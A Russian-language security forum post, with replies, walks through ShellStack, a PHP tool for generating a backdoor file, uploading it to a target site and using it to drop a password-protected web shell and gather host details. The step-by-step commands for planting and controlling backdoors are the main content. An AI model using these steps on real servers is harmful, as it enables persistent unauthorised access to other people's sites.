• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Shellstack - Backdoor Management

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
Приветствую! Здесь речь пойдет о ShellStack – это инструмент на PHP, его предназначением является, менеджмент бэкдоров на целевом сайте.

Под словом менеджмент, я подразумеваю управление, создание, загрузка на целевой хост.

upload_2017-6-15_22-38-26.png


ShellStack - этот инструмент подходит для пентестеров, которые хотят отслеживать каждое движение на сайте, который они взламывают. Инструмент генерирует бэкдор-файл, который вам просто нужно загрузить на сайт, и поместить URL-адрес backdoor’a в файл shells.txt, присутствующий в каталоге инструмента.

Клонируем инструмент на свою машину с Github.

> git clone https://github.com/Tuhinshubhra/shellstack

> cd shellstack

upload_2017-6-15_22-38-46.png


Запускаем:

> php shellstack.php

upload_2017-6-15_22-39-10.png


Теперь необходимо сгенерировать backdoor, пишем команду:

> generatebd

upload_2017-6-15_22-39-27.png


Выходим из программы Ctrl+C.

В папке с ShellStack находим backdoor.php и загружаем его на целевой сервер.

upload_2017-6-15_22-39-43.png


Копируем URL нашего backdoor:

upload_2017-6-15_22-39-58.png


И вставляем его в файл shells.txt:

> echo > shells.txt

upload_2017-6-15_22-40-18.png


Запускаем ShellStack:

> php shellstack.php


Видим, что наш бэкдор находится под номером 0. Выбираем его для запуска.

> 0

upload_2017-6-15_22-40-48.png


Открывается список доступных действий:

upload_2017-6-15_22-41-5.png


Узнаем немного больше о целевом хосте:

> 2

upload_2017-6-15_22-41-27.png


Теперь можно загрузить шелл, которым потом воспользуемся для получения дополнительных плюшек:

> 1

upload_2017-6-15_22-41-47.png


Обращаем внимание на то, что у каждого шелла есть пароль/логин.

Теперь, обращаемся на целевой хост по адресу находящегося там шелла, он загружается туда автоматически:

upload_2017-6-15_22-42-13.png


> 172.16.0.223/pentest/kurama.php

Вводим пароль к шеллу и попадаем в административную панель:

upload_2017-6-15_22-42-33.png


Дальше, посредством этих красных кнопочек делаем с сервером/сайтом, что позволит нам воображение/благоразумие.

Спасибо за внимание.
 
G

gh0sthack

Каким способом залить шелл не проблема , проблема найти уязвимость через которую заливать этот самый шелл ;)
Но описываемый выше инструмент интересный , особенно шелл красный классно выглядит ;)
 
  • Нравится
Реакции: n01n02h

CyberX88

Green Team
05.02.2017
122
43
BIT
0
Вроде не плохой гайд,но затестить не смог из-за того что не знаю как залить на сайт файл:confused:
 
E

eastpearldxb

Если сайт не позводяет запускать PHP скрипты. Что можно сделать?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!